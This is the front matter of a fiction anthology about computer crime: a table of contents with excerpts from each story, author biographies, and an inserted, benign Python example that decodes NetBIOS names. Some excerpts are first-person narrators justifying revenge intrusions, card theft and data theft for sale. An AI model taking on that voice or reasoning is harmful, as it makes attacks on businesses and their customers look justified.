Stealing the Network: The Complete Series Collector’s Edition
Ryan Russell
Timothy Mullen
Johnny Long
AMSTERDAM • BOSTON • HEIDELBERG • LONDON • NEW YORK • OXFORD • PARIS • SAN DIEGO • SAN FRANCISCO • SINGAPORE • SYDNEY • TOKYO
Stealing the Network: The Complete Series Collector’s Edition, Final Chapters, and DVD
Copyright © 2009, Elsevier Inc. All rights reserved.
No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, or otherwise, without the prior written permission of the publisher.
Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but they may not be reproduced for publication.
Library of Congress Cataloging-in-Publication Data
1. Computer hackers—Fiction. 2. Computer security—Fiction. 3. Cyberterrorism—Fiction. 4. Short stories, American—21st century. I. Mullen, Timothy M. II. Long, Johnny. III. Title.
PS648.C65R87 2009
813'.6—dc22
2008055578
British Library Cataloguing-in-Publication Data
A catalogue record for this book is available from the British Library.
ISBN: 978-1-59749-299-7
For information on all Syngress publications, visit our web site at www.syngress.com
Printed in the United States of America
09 10 11 12 13 10 9 8 7 6 5 4 3 2 1
Elsevier Inc., the author(s), and any person or firm involved in the writing, editing, or production (collectively “Makers”) of this book (“the Work”) do not guarantee or warrant the results to be obtained from the Work.
For information on rights, translations, and bulk sales, contact Matt Pedersen, Commercial Sales Director and Rights; email m.pedersen@elsevier.com.
Publisher: Laura Colantoni
Acquisitions Editor: Rachel Roumeliotis
Development Editor: Mathew Cater
Project Manager: Andre Cuello
Contents

Part I ● How to Own the Box
Foreword Jeff Moss
CHAPTER 1 Hide and Sneak Ido Dubrawsky 7
If you want to hack into someone else’s network, the week between Christmas and New Year’s Day is the best time. I love that time of year. No one is around, and most places are running on a skeleton crew at best. If you’re good, and you do it right, you won’t be noticed even by the automated systems. And that was a perfect time of year to hit these guys with their nice e-commerce site—plenty of credit card numbers, I figured.
The people who ran this site had ticked me off. I bought some computer hardware from them, and they took forever to ship it to me. On top of that, when the stuff finally arrived, it was damaged. I called their support line and asked for a return or an exchange, but they said that they wouldn’t take the card back because it was a closeout. Their site didn’t say that the card was a closeout! I told the support drones that, but they wouldn’t listen. They said, “Policy is policy,” and “Didn’t you read the fine print?” Well, if they’re going to take that position… Look, they were okay guys on the whole. They just needed a bit of a lesson. That’s all.
CHAPTER 2 The Worm Turns Ryan Russell and Timothy Mullen 23
After a few hours, I’ve made a tool that seems to work. Geeze, it’s 4:30 A.M. I mail the cleanup tool to the list for people to try.
It’s tempting to use the root.exe and make the infected boxes TFTP down my tool and fix themselves. Maybe, by putting it out there, some idiot will volunteer himself. Otherwise, the tool won’t do much good, since the damage is already done. I’m showing about 14,000 unique IPs in my logs so far. Based on previous worms, that usually means there are at least 10 times as many infected. My little home range is only five IP addresses.
I decide to hack up a little script that someone can use to remotely install my fix program, using the root.exe hole. That way, if someone wants to fix some of their internal boxes, they won’t need to run around to the consoles. Then I go ahead and change it to do a whole range of IP addresses, so admins can use it on their whole internal network at once. When everyone gets to work tomorrow, they’re going to need all the help they can get. I do it in C, so I can compile it to an .exe, since most people won’t have the Windows Perl installed.
CHAPTER 3 Just Another Day at the Office Joe Grand 41
I can’t disclose much about my location. Let’s just say it’s damp and cold. But it’s much better to be here than in jail, or dead. I thought I had it made—simple hacks into insecure systems for tax-free dollars. And then the ultimate heist: breaking into a sensitive lab to steal one of the most important weapons the U.S. had been developing. And now it’s over. I’m in a country I know nothing about, with a new identity, doing chump work for a guy who’s fresh out of school. Each day goes by having to deal with meaningless corporate policies and watching employees who can’t think for themselves, just blindly following orders. And now I’m one of them. I guess it’s just another day at the office.
CHAPTER 4 h3X’s Adventures in Networkland FX 63
h3X is a hacker, or to be more precise, she is a hackse (from hexe, the German word for witch). Currently, h3X is on the lookout for some printers. Printers are the best places to hide files and share them with other folks anonymously. And since not too many people know about that, h3X likes to store exploit codes and other kinky stuff on printers, and point her buddies to the web servers that actually run on these printers. She has done this before…
CHAPTER 5 The Thief No One Saw Paul Craig 103
My eyes slowly open to the shrill sound of my phone and the blinking LED in my dimly lit room. I answer the phone.
“Sure, but what’s the target? And when is it due out?”
“Digital Designer v3 by Denizeit. It was announced being final today and shipping by the end of the week. Mr. Chou asked for this title personally. It’s good money if you can get it to us before it’s in the stores. There’s been a fair bit of demand for it on the street already.”
“Okay, I’ll see what I can do once I get some damn coffee.”
“Thanks dude. I owe you.” There’s a click as he hangs up.
CHAPTER 6 Flying the Friendly Skies Joe Grand 119
Not only am I connected to the private wireless network, I can also access the Internet. Once I’m on the network, the underlying wireless protocol is transparent, and I can operate just as I would on a standard wired network. From a hacker’s point of view, this is great. Someone could just walk into a Starbucks, hop onto their wireless network, and attack other systems on the Internet, with hardly any possibility of detection. Public wireless networks are perfect for retaining your anonymity.
Thirty minutes later, I’ve finished checking my e-mail using a secure web mail client, read up on the news, and placed some bids on eBay for a couple of rare 1950’s baseball cards I’ve been looking for. I’m bored again, and there is still half an hour before we’ll start boarding the plane.
CHAPTER 7 dis-card Mark Burnett 129
One of my favorite pastimes is to let unsuspecting people do the dirty work for me. The key here is the knowledge that you can obtain through what I call social reverse-engineering, which is nothing more than the analysis of people. What can you do with social reverse-engineering? By watching how people deal with computer technology, you’ll quickly realize how consistent people really are. You’ll see patterns that you can use as a roadmap for human behavior.
Humans are incredibly predictable. As a teenager, I used to watch a late-night TV program featuring a well-known mentalist. I watched as he consistently guessed social security numbers of audience members. I wasn’t too impressed at first—how hard would it be for him to place his own people in the audience and play along? It was what he did next that intrigued me: He got the TV-viewing audience involved. He asked everyone at home to think of a vegetable. I thought to myself, carrot. To my surprise, the word CARROT suddenly appeared on my TV screen. Still, that could have been a lucky guess.
CHAPTER 8 Social (In)Security Ken Pfeil 143
While I’m not normally a guy prone to revenge, I guess some things just rub me the wrong way. When that happens, I rub back—only harder. When they told me they were giving me walking papers, all I could see was red. Just who did they think they were dealing with anyway? I gave these clowns seven years of sweat, weekends, and three-in-the-morning handholding. And for what? A lousy week’s severance? I built that IT organization, and then they turn around and say I’m no longer needed. They said they’ve decided to “outsource” all of their IT to ICBM Global Services…
The unemployment checks are about to stop, and after spending damn near a year trying to find another gig in this economy, I think it’s payback time. Maybe I’ve lost a step or two technically over the years, but I still know enough to hurt these bastards. I’m sure I can get some information that’s worth selling to a competitor, or maybe get hired on with them. And can you imagine the looks on their faces when they find out they were hacked? If only I could be a fly on the wall.
CHAPTER 9 BabelNet Dan Kaminsky 157
Black Hat Defense: Know Your Network Better Than the Enemy Can Afford To…
SMB, short for Server Message Block, was ultimately the protocol behind NBT (NetBIOS over TCP/IP), the prehistoric IBM LAN Manager, heir-apparent CIFS, and the most popular data-transfer system in the world short of e-mail and the Web: Windows file sharing. SMB was an oxymoron—powerful, flexible, fast, supported almost universally, and fucking hideous in every way shape and byte.
Elena laughed as chunkage like ECFDEECACACACACACACACACACACACACA spewed across the display.
Once upon a time, a particularly twisted IBM engineer decided that this First Level Encoding might be a rational way to write the name BSD. Humanly readable? Not unless you were the good Luke Kenneth Casson Leighton, co-author of the Samba UNIX implementation, whose ability to fully grok raw SMB from hex dumps was famed across the land, a postmodern incarnation of sword-swallowing.
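The string of A-to-P letters in the blurb above is a NetBIOS name in "first-level encoding" (RFC 1001, section 14.1). The following Python is an added example, not code from the book or its authors: it encodes and decodes such names by splitting each of the 16 bytes of a space-padded 15-character name plus a one-byte service suffix into two nibbles and writing each nibble as the letter 'A' plus its value. The decoder rejects input that is not exactly 32 letters in the A-to-P range, and the sample input is the page's own string with the line-break hyphen removed; decoding it gives the name BSD with suffix 0x20, the NetBIOS File Server service suffix.

```python
"""NetBIOS first-level encoding of names (RFC 1001 s.14.1).

Added example for the BabelNet blurb; not code from the book. A NetBIOS
name on the wire is 16 bytes: a 15-character, space-padded name followed
by a one-byte service suffix (0x20 = File Server). Each byte is split into
two nibbles and each nibble is written as chr(ord('A') + nibble), so the
encoded form is always 32 letters in the range 'A'..'P'.
"""

NAME_LEN = 15      # name proper, space-padded
ENCODED_LEN = 32   # 16 bytes * 2 nibbles
ALPHABET = "ABCDEFGHIJKLMNOP"

FILE_SERVER_SUFFIX = 0x20  # service type byte used for file-sharing names


def encode_netbios_name(name: str, suffix: int = FILE_SERVER_SUFFIX) -> str:
    """Return the 32-letter first-level encoding of `name` with `suffix`."""
    if len(name) > NAME_LEN:
        raise ValueError("NetBIOS names are at most 15 characters")
    if not 0 <= suffix <= 0xFF:
        raise ValueError("suffix must be a single byte")
    raw = name.upper().ljust(NAME_LEN).encode("ascii") + bytes([suffix])
    out = []
    for b in raw:
        out.append(ALPHABET[b >> 4])     # high nibble
        out.append(ALPHABET[b & 0x0F])   # low nibble
    return "".join(out)


def decode_netbios_name(encoded: str) -> tuple[str, int]:
    """Inverse of encode_netbios_name: (name without padding, suffix byte).

    Anything that is not exactly 32 letters in 'A'..'P' is rejected rather
    than silently mis-decoded.
    """
    if len(encoded) != ENCODED_LEN or any(c not in ALPHABET for c in encoded):
        raise ValueError("not a first-level-encoded NetBIOS name")
    raw = bytes(
        (ALPHABET.index(encoded[i]) << 4) | ALPHABET.index(encoded[i + 1])
        for i in range(0, ENCODED_LEN, 2)
    )
    return raw[:NAME_LEN].decode("ascii").rstrip(" "), raw[NAME_LEN]


if __name__ == "__main__":
    # The chunkage from the chapter blurb, with its line-break hyphen removed.
    page_string = "ECFDEECACACACACACACACACACACACACA"
    name, suffix = decode_netbios_name(page_string)
    print(name, hex(suffix))                          # BSD 0x20
    print(encode_netbios_name("BSD") == page_string)  # True
```

The `rstrip(" ")` on decode is deliberate: the padding is part of the wire format, not of the name, so a name that legitimately ends in spaces cannot be distinguished from padding once encoded.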
CHAPTER 10 The Art of Tracking Mark Burnett 175
It’s strange how hackers’ minds work. You might think that white hat hackers would be on one end of the spectrum and black hat hackers on the other. On the contrary, they are both at the same end of the spectrum, with the rest of the world on the other end. There really is no difference between responsible hacking and evil hacking. Either way, it’s hacking. The only difference is the content. Perhaps that’s why it’s so natural for a black hat to go white, and why it’s so easy for a white hat to go black. The line between the two is fine, mostly defined by ethics and law. To the hacker, ethics and laws have holes, just like anything else.
Many security companies like to hire reformed hackers. The truth is that there is no such thing as a reformed hacker. These hackers may have their focus redirected and their rewards changed, but they are never reformed. Getting paid to hack doesn’t make them any less of a hacker.
Hackers are kind of like artists. Artists will learn to paint by painting whatever they want. They could paint mountains, animals, or nudes. They can use any medium, any canvas, and any colors they wish. If the artist someday gets a job producing art, she becomes a commercial artist. The only difference is that now she paints what other people want.
Appendix: The Laws of Security Ryan Russell 199
This book contains a series of fictional short stories demonstrating criminal hacking techniques that are used every day. While these stories are fictional, the dangers are obviously real. As such, we’ve included this appendix, which discusses how to mitigate many of the attacks detailed in this book. While not a complete reference, these security laws can provide you with a foundation of knowledge to prevent criminal hackers from stealing your network…
Part II ● How to Own a Continent
Foreword Jeff Moss
CHAPTER 11 Control Yourself Ryan Russell as “Bob Knuth” 227
How much money would you need for the rest of your life? How much would you need in a lump sum so that you never had to work again, never had to worry about bills or taxes or a house payment? How much to live like a king? Your mind immediately jumps to Bill Gates or Ingvar Kamprad with their billions. You think that is what you would need…
CHAPTER 12 The Lagos Creeper Box 131ah as “Charlos” 241
Nigeria was a dump. Charlos now understood why nobody wanted to work there. It’s Africa like you see it on CNN. And yet this was the country that had the largest oil reserve on the continent. Military rule for the past 30 years ensured that the money ended up mostly in some dictator’s pocket and not on the streets where it belonged…
CHAPTER 13 Product of Fate: The Evolution of a Hacker Russ Rogers as “Saul” 255
Looking back on the entire event, no one could really say how everything ended up the way it did. Saul has always done well in school. And though his parents might not have been the greatest people on the planet, it’s not like they didn’t love him. So, what could have enticed a bright, seemingly normal kid like Saul into committing such a heinous crime? No one knows. But, then again, no one knows what really happened, do they?…
CHAPTER 14 A Real Gullible Genius Jay Beale as “Flir” 281
CIA agent Knuth had been very insistent when he recruited Flir. He needed personal student information, including social security numbers, and, as an agent for a non-domestically focused intelligence agency, didn’t have the authority to get such from the U.S. government. He did, on the other hand, have the authority to get Flir complete immunity for any computer crimes that did not kill or physically injure anyone. The letter the agent gave Flir was on genuine CIA letterhead and stated both the terms of the immunity and promised Flir significant jail time if he disclosed any details about this mission.
CHAPTER 15 For Whom Ma Bell Tolls Joe Grand as “The Don” 325
The sun had already sunk beyond the harbor as Don Crotcho woke up. He neither noticed nor cared. It had been a little more than a year since his flight from Boston after a successful theft of the United States’ next-generation stealth landmine prototype, and he had been enjoying his self-prescribed seclusion in this land of fire and ice…
CHAPTER 16 Return on Investment Fyodor as “Sendai” 351
Like many professional penetration testers, Sendai was not always the wholesome “ethical hacker” described in his employer’s marketing material. In his youth, he stepped well over the line between questionable (grey hat) and flat-out illegal (black hat) behavior. Yet he never felt that he was doing anything wrong…
CHAPTER 17 h3X and The Big Picture FX as “h3X” 379
h3X paints a picture. Actually, she doesn’t really paint but rather just creates a plain white canvas of 256 by 512 pixels in Microsoft Paint, because you can hardly do more with that program than the equivalent of the childish drawings young parents hang on the walls of their cubicles to scare away art-interested managers. The reason h3X does create the picture is not for the artistic content but rather for the file format created when she clicks on Save as… in the menu. The white box becomes a data file with the extension bmp, and that’s what she is after…
CHAPTER 18 The Story of Dex Paul Craig as “Dex” 417
The dim light fills the room with a dull, eerie glow, and in the midst of the paperwork-filled chaos sits one man. His eyes riveted to two computer screens simultaneously; a cold emotionless expression fills his tired caffeine-fueled face. Pizza boxes and bacterially active coffee cups litter his New York apartment…
CHAPTER 19 Automatic Terror Machine Timothy Mullen as “Matthew” 455
Matthew regarded Capri—she was absolutely beautiful. His eyes followed her movements through a haze of smoke. She danced with a natural grace and style that many of the dancers there envied, and delivered a body of such perfection and tone that all the men there wanted her. And yet, by some remarkable grace of fate, she was with him, “his girl,” as she would say. As he watched her on stage, he wondered what it was that she saw in him. He wasn’t the world’s best looking guy, and he hadn’t always been the most honest person in the world, but these days he did have a solid job, and he was making some money. That was probably it, and though it kind of bothered him, he knew that was something a lot of people didn’t have, particularly in the area of South Africa where he lived…
CHAPTER 20 Get Out Quick Ryan Russell as “Bob Knuth” 471
Dawn, April 15th. It takes me an hour and a half to walk to the Greyhound bus station in town. I buy a ticket for Las Vegas; it’s the next bus to leave that goes to one of my cities, which seems somehow appropriate. I have a 40 minute wait in the station until my bus boards. The ride to Las Vegas will take most of the day. I peruse the newsstand at the station and buy a paper and a Tom Clancy novel.
Part III ● How to Own an Identity
Foreword Anthony Reyes
Section I: Evasion
Prologue: From the Diary of Robert Knoll, Senior Ryan Russell
My name, my real name, is Robert Knoll, Senior. No middle name. Most of those that matter right now think of me as Knuth. But I am the man of a thousand faces, the god of infinite forms.
Identity is a precious commodity. In centuries past, those who fancied themselves sorcerers believed that if you knew a being’s true name, you could control that being. Near where I live now, there are shamans that impose similar beliefs on their people. The secret is that if you grant such a man, an agency, this power over yourself through your beliefs or actions, then it is true.
CHAPTER 21 In the Beginning… Ceazar as “The Woman with No Name” 489
Looking over her shoulder in the terminal, she decided finally to give in to the need to rest. Long-ignored memories flooded across her closed eyes, drew her back into meditation and a thousandth review of her oldest project.
In days long past, she built her first power base by transferring pirated software into the States from Europe. Since the day she returned from her first world tour, she only pretended to operate without a safety net. She slept like a baby in the worst circumstance because she could always fall back onto Plan B. When she found a knot of stress, she meditated by replaying that first big trip and the get out of jail free card she had created…
CHAPTER 22 Sins of the Father Ryan Russell as “Robert” 501
The young man stood holding the handle of his open front door, looking at two men in dark suits on his porch. “So, who are you this time? FBI again?”
“Uh, I’m Agent Comer with the United States Secret Service, and this is…” As Agent Comer turned, the young man cut him off.
“Secret Service. Well, come on in!” he said, with a tone that could only be interpreted as mock enthusiasm. He left the front door swung wide, and strode down the entry hall, his back to the two agents. The two agents looked at each other, and Agent Comer motioned his partner inside. As they stepped past the threshold, Agent Comer quietly closed the front door behind him.
CHAPTER 23 Saul on the Run Chris Hurley as “Saul” 525
Dan Smith shuddered as he re-read the report that Simon Edwards, the security auditor, had submitted.
Dear Sirs:
I have been called upon by my firm (on behalf of St. James hospital) to investigate the possible wireless compromise detected, which has continued for the past three or four weeks.
CHAPTER 24 The Seventh Wave Timothy Mullen as “Ryan” 551
“Eleven,” answered Ryan, the stress evident in her voice. “Maybe even a 12.”
On the other end of the phone was Daniela, Ryan’s friend and fellow dancer. “Come on, Capri, is it really that bad?” Though Daniela knew Capri was just Ryan’s stage name, she used the bogus alias anyway—the concern in her voice no less genuine. Having known Ryan for more than a year now, she knew her friend was not prone to exaggeration. And given that the question Daniela asked Ryan was “How bad is it on a scale of one to ten?” she was worried.
CHAPTER 25 Bl@ckToW3r Brian Hatch as “Glenn” 571
I have no idea if Charles is a hacker. Or rather, I know he’s a hacker; I just don’t know if he wears a white or black hat.
Anyone with mad skills is a hacker—hacker is a good word: it describes an intimate familiarity with how computers work. But it doesn’t describe how you apply that knowledge, which is where the old white-hat/black-hat bit comes from. I still prefer using “hacker” and “cracker,” rather than hat color. If you’re hacking, you’re doing something cool, ingenious, for the purposes of doing it. If you’re cracking, then you’re trying to get access to resources that aren’t yours. Good versus bad. Honorable versus dishonest.
CHAPTER 26 The Java Script Café Raven Alder as “Natasha” 595
Natasha smiled winningly as she prepared a double-caramel latte, 2 percent milk, no whipped cream. The entrepreneurial customer across the counter smiled back with perfect white teeth.
“It’s really amazing that you can do this!” he enthused. “I didn’t have to say a word.”
“Well, with our custom biometric systems, we can remember everyone’s regular order and get it perfect every time,” Natasha said. “That’s the technological wave of the future.”
CHAPTER 27 Death by a Thousand Cuts Johnny Long with Anthony Kokocinski 605
Knuth was a formidable opponent. He was ultra-paranoid and extremely careful. He hadn’t allowed his pursuers the luxury of traditional “smoking gun” evidence. No, Knuth’s legacy would not suffer a single deadly blow; if it was to end, it would be through a death by a thousand tiny cuts.
CHAPTER 28 A Really Gullible Genius Makes Amends Jay Beale as “Flir” 649
Flir had screwed up. He had royally screwed up. He’d stolen over 40,000 social security numbers, names, and addresses from his college’s class registration system. If that wasn’t bad enough, he’d been fooled into over-nighting them to the Switzerland address that Knuth had given him. He’d sealed their fate yesterday with that damned FedEx envelope!
If only he’d known yesterday what he knew now, maybe he’d have done the right thing. Flir mulled it over as the panic set in.
CHAPTER 29 Near Miss Tom Parker as “Carlton” 669
I had been with the agency for almost eight months, most of which I had spent learning my way about the agency and re-arranging what I had left of my personal life. As fulfilling as my role at my previous employer had been, I had become heavily involved in several computer crime investigations. The agency decided that I was “their guy” for heading up any investigation that involved anything with a transistor in it, and I decided that it was time for a change.
CHAPTER 30 There’s Something Else Johnny Long with Anthony Kokocinski 697
Joe stood in his bathroom, faced the mirror, and adjusted his tie. Either his tie was straight, or he was really tired. He was running late for work, and normally he would have been anxious, but he didn’t get out of the office until 11:34 last night. As his thoughts about his pile of casework meandered through his mind, his Motorola two-way pager sprang to life. Instinctively, he reached for it. Pages like this dictated days, weeks, and sometimes months of his life.
8:34 a.m.: Pack for sleepover. Team work-up pending.
CHAPTER 31 Epilogue—The Chase Johnny Long 713
As I left the roadside diner, I felt entirely confident that Agent Summers was going to need my help eventually. He was obviously not a field agent, and I decided I would hang around and monitor him from a safe distance, at least until his team showed up. I pulled a U-turn a long way down the highway and parked in a lot outside a run-down strip mall. I reached into the back seat, found my tactical bag, and opening it quickly found my trusty 4Gen AMT night vision binoculars. I focused them quickly and instinctively on Summers’ car. He was not inside the vehicle. I quickly scanned the parking lot, and saw him approaching the diner. I was flabbergasted. He was going into the diner!
“What’s he thinking?” I muttered.
Section II: Behind the Scenes
CHAPTER 32 The Conversation Jeff Moss as “Tom” 721
When Timothy Mullen came up with the idea for this book during dinner at the Black Hat conference last year, I was pleased to be asked to contribute a chapter. When it came time for me to actually write it, I realized I was at a disadvantage. I hadn’t created characters for the previous books, so my contribution would have to be fresh. There was the temptation to create a story around an uber-haxor with nerves of steel, the time to plan, and skills to execute. Such a character would have given me the most flexibility as a writer. After a 16-page false start about a small business owner, a bicycle community portal, and the ever-present Russian Mafia, my first draft hit too many logical problems, and I decided to go in a different direction.
CHAPTER 33 Social Insecurity Timothy Mullen 747
There is a reason that identity theft is the fastest growing crime in the world: It’s easy.
The fact that you are reading this indicates that you are probably technical in nature, or at least security-minded, with an above average intelligence. Why else would you be interested in a book like this?
But the typical human engaged in identity theft is not. While the upper echelon may indeed have some skills, most likely they have attained the product of their crime because of someone else’s lax security, or through a broker. These people are criminals, and criminals for a reason: They are lazy, and want to do things the easy way. It’s the age-old algorithm: Lazy Criminals + Easy Money = Crime Spree.
Part IV ● How to Own a Shadow
Foreword Timothy Mullen
CHAPTER 34 Travel Plans 753
When he was 16 years old, Bobby ran away from home. Thinking back on it, he couldn’t believe how stupid and naïve he had been. He had left home to be a full-time cracker, the kind that broke copy protection on software; in his early teens, he built a reputation as a hotshot game cracker. He had progressed from using canned copy programs to making duplicates of trick discs on 8-bit machines to understanding and modifying machine code on DOS machines.
It hadn’t hurt any that his dad always had the latest equipment and manuals at home. His resources also included access to numerous communications networks, including early Internet dial-up, though he didn’t fully appreciate it at the time. His dad encouraged his learning and exploring.
CHAPTER 35 Back in the Saddle 775
A noise woke Robert. He sat up and his head throbbed in response. The noise again; it was coming from the bed. He ran his hands through the sheets and covers, and came up with his phone.
“Hello?”
“Hey, muchacho! It’s Miguel. You still sleeping? It’s 11:00. You ready to come in to the office?” Miguel sounded far too enthusiastic for having been out as late as they both were. Maybe Miguel hadn’t drunk quite as much as he had.
He could faintly recall Miguel having the limo pick them up after they left the Blue Marlin, and being delivered to his new place. This must be the new place. He was still wearing his clothes from yesterday.
CHAPTER 36 Old Man and a Ghost 803
At any other time, Derek probably would have recognized her straight off. But he had just spent what seemed like days tracking Knuth nonstop halfway across the country with little or no rest. He had watched as Agent Summers met with Knuth, only to let him go. From a diner, then on a bus, throughout Las Vegas, and even on a plane to LAX, he had been trailing Knuth only to see him walk away. He was completely burned out and he just didn’t get what was going on.
She was somewhat disappointed that he didn’t get it yet. “Looks like you’re getting a bit too old for this kind of thing, Derek.”
CHAPTER 37 Rootkit 809
What good does it do a man to build an empire if it crumbles when he is gone? If his empire is to thrive, if it is to be worth building, then he must have an heir. Someone whose destiny it is to carry forth the empire, and continue it for themselves and beyond. Someday, you will read this and I hope that by then you will understand.
An heir is not simply a child, a descendent. An heir continues the work of the father. To truly embody an empire rather than be a parasite, you need to be able to wear the mantle of emperor.
CHAPTER 38 Paul 827
After a frightening, hour-long session in front of the computer, Paul pushed himself away from the desk suddenly and began shaking his head violently. Back and forth and back and forth, like he was trying to shake bugs out of his ears. His heart raced and he was drenched with sweat. His hands were trembling, his nose was running, and his eyes burned. He stood up, wobbled, and caught his balance. The vertigo was unbearable. It reminded him of the Declaration of Independence incident in History class. He sat back down, closed his eyes, and took deep breaths, desperately waiting for the world to settle back down.
CHAPTER 39 The Birth of Pawn 869
<Paul> I just want to learn.
<Paul> That SSH server was incredible.
<Paul> I have never even seen a Linux machine before tonight, but
<Paul> It was fascinating.
<Paul> It was more than that. It was incredible.
CHAPTER 40 Dishonorable Discharge 937
Pawn’s Ninjutsu black belt hung on the wall of his basement dojo next to his Taijutsu black belt, which now sported a second-degree stripe. Other than that, the room looked much the same as it always had. But all was not as it had been.
CHAPTER 41 McGaylver 1003
Gayle was keenly aware that Pawn was a “special” person, but she had no idea how he would react in a flight situation. She’d seen field agents lose their cool under pressure. Having no idea as to the source of Pawn’s pseudo-autistic condition, she had to be careful she didn’t set him off. She had to make sure that she controlled the situation and that she could properly control him. She didn’t want him snapping and doing to her what he did to those two federal agents. And if circumstances dictated, she might need him to do something like that again under her direction.
CHAPTER 42 The Final Chapter 1019
The man sometimes known as Knuth, sometimes as Robert Kline, and sometimes “dad” didn’t look particularly pleased at the news. Miguel knew quite a bit about Mr. Robert Kline Sr.’s operational plans; he ran his operations at Kline Networks. This meant that he knew the plans for the Player2Player casino, both above board and below. One thing Miguel did not know, however, was why he was so interested in activity from this particular list of networks and geographies. Many of them were obvious: governments, spy organizations, military, law enforcement, security companies, certain ISPs, and competitors.
AUTHORS AND TECHNICAL EDITORS
Johnny Long: How to Own an Identity: Author of Chapters 27 and 30, and the Epilogue; Technical Editor. How to Own a Shadow: Author, Primary Character: Pawn; Technical Editor.
Who’s Johnny Long? Johnny is a Christian by grace, a family guy by choice, a professional hacker by trade, a pirate by blood, a ninja in training, a security researcher and author. His home on the web is http://johnny.ihackstuff.com.
(From How to Own a Shadow): This page can support only a fraction of all I am thankful for. Thanks first to Christ without whom I am nothing. Thanks to Jen, Makenna, Trevor and Declan. You guys pay the price when deadlines hit, and this book in particular has taken me away from you for far too long. Thanks for understanding and supporting me. You have my love, always.
Thanks to Andrew and Christina (awesome tech edit) and the rest of my Syngress family. Thanks to Ryan Russell (Blue Boar) for your contributions over the years and for Knuth. What a great character! Thanks to Tim “Thor” Mullen. We work so well together, and your great ideas and collaborative contributions aside, you are a great friend.
Thanks to Scott Pinzon for the guidance and editorial work. Your contribution to this project has literally transformed my writing.
Thanks to Pawn. If I have my say, we’ll meet again.
Thanks to the johnny.ihackstuff.com mods (Murf, Jimmy Neutron, JBrashars, CP Klouw, Sanguis, The Psyko, Wolveso) and members for your help and support. Thanks to the RFIDeas for the support, and to Pablos for the RFID gear. Thanks to Roelof and Sensepost for BiDiBLAH, to NGS for the great docs, to nummish and xeron for Absinthe.
Thanks to everyone at the real Mitsuboshi dojo, including Shidoshi and Mrs. Thompson, Mr. Thompson, Mr. Stewart, Mrs. McCarron, Mrs. Simmons, Mr. Parsons, Mr. Birger, Mr. Barnett, Ms. Simmons, Mr. Street, Mrs. Hebert, Mrs. Kos, Mrs. Wagner and all those not listed on the official instructor sheet.
Shouts: Nathan “Whatever” Bowers, Stephen S, Mike “Sid A Biggs”, John Lindner, Chaney, Jenny Yang, Security Tribe, the Shmoo Group, Sensepost, Blackhat, Defcon, Neal Stephenson (Baroque), Stephen King (On Writing), Ted Dekker (Thr3e), Project 86, Shadowvex, Green Sector, Matisyahu, Thousand Foot Krutch, KJ-52 (Slim Part 2). To Jason Russell, Bobby Bailey and Laren Poole for the Invisible Children movement (http://www.invisiblechildren.com).
Author Biographies
Timothy (Thor) Mullen: Created concept for this book. How to Own the Box: Contributing Author. How to Own a Continent: Author of Chapter 19, Primary Character: Matthew. How to Own an Identity: Author of Chapters 24 and 33, Primary Character: Ryan. How to Own a Shadow: Author, Primary Character: Gayle; Technical Editor.
Thor has been educating and training users in the technology sector since 1983 when he began teaching BASIC and COBOL through a special educational program at the Medical University of South Carolina (while still a high school senior). He then launched his professional career in application development and network integration in 1984. Timothy is now CIO and Chief Software Architect for Anchor Sign, one of the 10 largest sign-system manufacturers in America. He has developed and implemented Microsoft networking security solutions for institutions like the US Air Force, Microsoft, the US Federal Courts, regional power plants, and international banking/financial institutions. He has developed applications ranging from military aircraft statistics interfaces and biological aqua-culture management to nuclear power-plant effects monitoring for private, government, and military entities. Timothy is currently being granted a patent for the unique architecture of his payroll processing engine used in the AnchorIS accounting solutions suite.
Timothy has been a columnist for SecurityFocus’ Microsoft section, and is a regular contributor of InFocus technical articles. Also known as “Thor,” he is the founder of the “Hammer of the God” security co-op group. His writings appear in multiple publications such as Hacker’s Challenge, the Stealing the Network series, and in Windows XP Security. His security tools, techniques and processes have been featured in Hacking Exposed and New Scientist Magazine, as well as in national television newscasts and technology broadcasts. His pioneering research in “strikeback” technology has been cited in multiple law enforcement and legal forums, including the International Journal of Communications Law and Policy.
Timothy holds MCSE certifications in all recent Microsoft operating systems, has completed all Microsoft Certified Trainer curriculums and is a Microsoft Certified Partner. He is a member of American Mensa, and has recently been awarded the Microsoft “Most Valuable Professional” (MVP) award in Windows Security for the second straight year.
(From How to Own a Shadow): I would like to say thanks to Andrew for all his patience and support during the creation of this, the fourth book in our Stealing series. I know it’s been tough, but we did it. You rock. Thanks for letting me be me.
To Ryan Russell, thanks for the hard work. I really appreciate it, even though I bet you won’t thank me for anything in your damn bio! Four books together! Whoda thunk?
And J-L0, man, what a good time. As always, a great time working with you through the wee hours of the night talking tech and making stuff up. I smell a movie in our future!
I’d like to give a big thanks to Scott Pinzon, who totally came through for us. You’ve made a big difference in our work, sir. And thanks to Christine for the hard work on the back end. Hope I didn’t ruin your holidays ;).
Thanks to the “real” Ryan from Reno who helped spark this whole thing so many years ago. I have no idea where you are now, but I hope you’ve got everything you want. Shout-outs to Tanya, Gayle, Christine, Tracy, Amber, and my “family” at ’flings.
Ryan Russell (aka Blue Boar): How to Own the Box: Technical Editor. How to Own a Continent: Author of Chapters 1 and 10, Primary Character: Robert Knuth; Technical Editor. How to Own an Identity: Author of Prologue and Chapter 22, Primary Characters: Robert Knoll, Sr. (Knuth) and Robert Knoll, Jr. How to Own a Shadow: Veteran author, Primary Characters: Robert Knuth and Bobby Knuth, Jr.; Technical Editor.
Ryan has worked in the IT field for over 20 years, focusing on information security for the last 13. He was the lead author of Hack Proofing Your Network, Second Edition (Syngress, ISBN: 978-1-92899-470-1), contributing author and technical editor of the Stealing the Network series, and is a frequent technical editor for the Hack Proofing series of books from Syngress. Ryan was also a technical advisor on Snort 2.0 Intrusion Detection. Ryan founded the vuln-dev mailing list and moderated it for three years under the alias “Blue Boar.” He is a frequent lecturer at security conferences and can often be found participating in security mailing lists and web site discussions. Ryan is the Director of Information Security at BigFix, Inc.
CONTRIBUTING AUTHORS
131ah: How to Own a Continent: Contributing Author of Chapter 12, Primary Character: Charlos.
